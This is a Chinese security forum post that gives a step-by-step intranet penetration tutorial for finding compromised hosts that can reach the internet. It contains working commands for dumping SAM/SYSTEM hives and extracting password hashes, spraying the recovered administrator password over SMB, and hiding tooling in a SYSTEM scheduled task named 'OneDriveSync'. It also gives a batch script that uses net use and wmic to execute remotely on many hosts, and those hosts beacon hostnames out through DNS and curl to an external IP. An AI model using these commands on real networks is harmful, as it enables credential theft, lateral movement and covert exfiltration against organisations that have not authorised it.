安全矩阵

 找回密码
 立即注册
搜索
查看: 4615|回复: 0

如何在目标内网中快速定位 "出网机"

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-7-27 12:24:28 | 显示全部楼层 |阅读模式

声明:
    文章初衷仅为攻防研究学习交流之用,严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无任何关联

    另外,这只是一个个人性质的公众号(非任何商业营销号),目的也仅为技术分享交流,除了公众号自身,将不再考虑做其他任何推广 ( 细心的你,可能也发现了,至今为止,甚至连一则外部广告都不曾出现过 ),故,严禁所有未经本人明确授权的恶意转载 及 非法营销牟利行为


0x01 实战场景说明
    长期以来,非常多的组织,机构,企业...由于各种各样的原因,为加大对内网的管控力度,可能会通过各种各样的手段,去限制内网机随意访问外网,比如,针对普通办公网的各种商业安全审计系统,针对DMZ的各种acl策略限制 , 各种"软硬"隔离 等等等...诸如此类

    日常内网渗透中,可能会经常遇到这样的情况,拿到webshell之后发现当前机器无法正常访问外网(不能出网), 经简单尝试 DNS,Tcp,Udp,icmp... 均无法正常出( 此处的Tcp,主要针对 80,443,53,8080,21,110 这些穿透性稍好的端口)

    确实,利用各种正向代理依然可以继续去搞内网,甚至做维持,搞内网可能问题不大,但如果是维持,成本可能就稍微有些高了,所以,最好的方式还是能想办法找台能正常出网的内网机稳住才行,以此作为后续的长期入口( 依然是那句话,当前机器不出网,不代表所有机器都不出网,当前内网段不出网,也不代表所有内网段都不出网,慢慢耐心找,体力活,同样,此处暂不考虑极个别极端情况),ok,前面都是废话,接着就简单来看下,怎么在目标内网中去批量找出网机


0x02 实操过程

第一步,提取所有本地用户密码hash
    假设前期通过Web提到了一台目标内网机权限,发现其无法正常出网后,接着走正常流程,先把本地hash提取一下,解密得知administrator的明文密码为admin!@#45,注意,此处的reg转储动作大部分杀软/EDR基本都不太会干预 ( 360套装[卫士 + 杀毒]并未拦 )​​​​​​​

  1. # cd c:/users/public
  2. # reg save HKLM\SYSTEM sys.hiv
  3. # reg save HKLM\SAM sam.hiv
  4. # reg save hklm\security security.hiv
  5. # secretsdump_windows.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
  6. # del *.hiv secretsdump_windows.exe /F
复制代码


第二步,批量SMB喷射
    拿着上面解出的密码,对指定内网存活机进行批量SMB喷射 (即所有开了135端口的ip列表,因为后需要利用wmi远程执行[计划任务和系统服务也是同理,扫445的IP即可]) ,check.bat 如下 smbcheck.exe 放到bat同目录下
  1. smbbru.exe -s 192.168.159.0/24 -u administrator -p admin!@#45 -t 12
复制代码
   由于喷射过程时间稍长,故可直接利用本地计划任务去起它 (注,部分杀软/EDR可能会拦截schtasks.exe)​​​​​​​

  1. # schtasks /create /RL HIGHEST /F /tn "OneDriveSync" /tr "C:/Users/Public/check.bat" /sc DAILY /mo 1 /ST 08:25 /RU SYSTEM
  2. # schtasks /query | findstr "OneDriveSync"
  3. # schtasks /run /tn OneDriveSync
  4. # schtasks /delete /F /tn OneDriveSync
复制代码
   稍等片刻,最终喷射结果如下,其实有很多管理员自身是有一定的安全意识的,只是不怎么完善,或者说懒,嫌麻烦而已,比如,他也确实也知道要把自己的系统密码设的复杂一些,但日常要管理的机器数量可能比较庞大,加之工作繁杂,图方便省心,就免不了会出现一个密码通杀一批机器的现象,所以,只要想办法抓到一些关键的系统账号密码,估计很多机器都要跟着受牵连,即使不能通杀很多,但其它的系统密码可能也都是基于现在的这个密码演变的,不妨试着猜猜
​    第三步,最后,拿着上面喷射成功的列表,开始批量查找出网机( 即 出网刺探 )
    NetInfo.bat 如下, 刺探项主要包括 DNS,TCP的 80,443,53,8080端口,其它端口后续可根据自己的实际情况酌情加( icmp,udp此处暂不做说明 )
  1. ping %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE%.9345mt.dnslog.cn -n 2 -w 2
  2. for %%k in (80,53,8080,443) do @C:\users\public\curl.exe -X POST -d "{ %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE% }" --connect-timeout 2 -m 3 --retry 1 -k --retry-delay 1 -s --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36" --referer "https://www.baidu.com" http://21.227.183.159:%%k
复制代码

  scan.bat 如下 [ 注,此处用的wmic去远程执行,故暂不考虑 2008以下的系统,另外,由于远程执行命令默认调的cmd.exe,360会拦,但也并不是所有的杀软/EDR都会拦 ]

  1. @echo off

  2. for /f "delims=" %%i in (host.txt) do @(
  3.   echo.
  4.   echo %%i Rce Begining ...
  5.   net use \\%%i\c$ /user:"administrator" "admin!@#45" > null
  6.   copy NetInfo.bat \\%%i\c$\users\public\ /y > null
  7.   copy curl.exe \\%%i\c$\users\public\ /y > null
  8.   echo.
  9.   wmic /node:%%i /user:".\administrator" /password:"admin!@#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"
  10.   ping 127.0.0.1 -n 42 > null
  11.   echo.
  12.   echo.
  13.   del \\%%i\c$\users\public\NetInfo.bat /F
  14.   del \\%%i\c$\users\public\curl.exe /F
  15.   net use \\%%i\c$ /del  > nul
  16. )
复制代码

   Wmic.exe 本身其实也是支持直接批量远程执行的,但实际中经常会出现命令没有执行成功的情况,所以,还是直接用批处理for一下比较稳妥
  1. wmic /node:@iplist.txt /user:".\administrator" /password:"admin!@#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"
复制代码

最终, 实际的 批量出网刺探 效果如下,注意,此处的dnslog 平台非常建议不要直接用别人的,自己搭一个就好,反正都是基础设施的一部分,必不可少

​执行脚本前,记得先到自己的VPS上把那些向外刺探的端口全部同时监听起来,主要通过这个看下到底 哪台机器的哪个端口能正常接到数据,后续迁徙到对应的那台机器上操作即可
  1. # nc -lkvp 80
复制代码


小结:
    至止,关于内网出网机批量查找就结束了,非常简单,之前经常有弟兄会问到,所以此处就做一次集中说明,实战中还是建议把上面脚本的功能全部再用其他语言自行重新实现,文中所有的脚本仅作demo效果参考,包括之前文章中的各种脚本,仅仅也都只是为了做demo效果演示,实际存活率可能并不怎么样,故,最好的方式还是要自己动手丰衣足食,ok,还是那句话,一篇文章只解决一个实际问题,就不多废话了,有任何问题,也欢迎弟兄们及时反馈,祝好运



    如果觉得确实还不错,也欢迎积极转发留言,以便让更多真正需要的人都能看到,如遇到文中错误,也欢迎随时私信指正,非常感谢






回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 04:51 , Processed in 0.012633 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表